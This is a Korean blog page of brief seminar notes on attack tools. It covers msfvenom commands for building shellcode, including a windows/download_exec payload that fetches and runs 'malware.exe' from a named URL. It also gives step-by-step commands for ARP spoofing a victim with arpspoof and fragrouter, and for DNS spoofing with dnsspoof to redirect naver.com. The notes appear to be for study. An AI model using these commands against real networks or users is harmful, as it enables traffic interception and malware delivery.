참교육

이번 세미나때 들은걸로 자세한 설명은 추후에 .. msfvenom --help- 쉘코드 만드는 명령어 msfvenon -l payloads-만들 수 있는 공격코드 목록 msfvenon -l encoders- 사용하는 CPU(alpha_upper, shikata_ga_nai를 많이 사용) msfvenon --help-formats- 쉘코드 작성 언어 msfvenom -p windows/download_exec --payload-options- --pyadloa-options : 앞에 나온 공격 코드의 사용할 수 있는 옵션 목록 간단한 쉘코드 만들기 예제msfvenom -p windows/download_exec EXE=malware.exe URL=http://dev.fngs.kr/malware.exe -e..

ARP Spoof 가 되어있다는 전제하에... 1. dns 설정파일 만들기ex) 8.8.8.8 *.naver.com원하는 아이피와 주소를 입력한다. 위의 예는 naver.com으로 들어가면 8.8.8.8이라는 IP주소로 바꿔치기 하기 위한 설정파일이다. 2. 스푸핑dnsspoof -f "파일명" 파일명은 위에서 작성한 파일명. arp 패킷을 감시하다가 특정 URL로 DNS 패킷이 나오면 IP주소를 바꿔치기한다.

1. arp 패킷arpspoof -i "interface" -t "IP Address" "Gateway Address" interface는 ifconfig로 알아낼 수 있고 ip, gateway는 victim 환경의 주소다. 이 명령어는 arp 패킷만 보내는 거라서 이것만 하면 인터넷이 안된다. 꼭 포워딩을 해줘야된다. 2. 포워딩fragrouter -B1-B1이 일반적인 포워딩 옵션으로 대부분 이걸 쓴다. 궁금하면 shell에 fragrouter 치면 해당 옵션에 대한 설명이 나온다.